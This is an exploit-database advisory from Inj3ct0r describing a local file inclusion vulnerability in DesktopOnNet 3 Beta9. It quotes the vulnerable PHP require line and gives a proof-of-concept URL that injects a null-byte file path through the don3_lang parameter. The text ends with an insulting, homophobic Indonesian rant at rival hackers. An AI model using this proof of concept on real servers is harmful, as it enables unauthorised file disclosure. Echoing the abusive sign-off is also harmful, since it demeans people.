[+] DesktopOnNet 3 Beta9 Local File Include Vulnerability 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ###################################### 1 0 I'm cr4wl3r member from Inj3ct0r Team 1 1 ###################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 [+] Discovered By: cr4wl3r [+] Download: http://sourceforge.net/projects/don3/files/ [x] Code in [DON3/applications/don3_toolbox.don3app/don3_toolbox.php] require("appfiles/languages/$don3_lang.php"); <--- LFI if (!file_exists('library/don3_toolbox.don3lib')){ don3_do_don3lib("DON3: ToolBox;window;M;", "don3_toolbox"); } $item = $_GET["ac"]; $toolbox_path = $app_path; if (array_key_exists($item, $don3_toolbox_overview_words)){ $currently = $don3_toolbox_overview_words[$item]; } else { $currently = $don3_toolbox_overview_words["start"]; } [+] PoC: [path]/applications/don3_toolbox.don3app/don3_toolbox.php?don3_lang=[LFI%00] [+] Fuck To: Buat loe yang hanya bisa main loncat-loncat indah, mau ngaku hacker loe anjing. bisanya hanya jumping server. dasar dodol loe anjing gay. ngaku hacker bisanya hanya loncat indah. mau jadi penari loncat indah loe anjing??? wkwkwkwkwkwk Follow me if you can anjing. Gw atau loe yang merasa tersindir anjing??? Main balon sana dodol.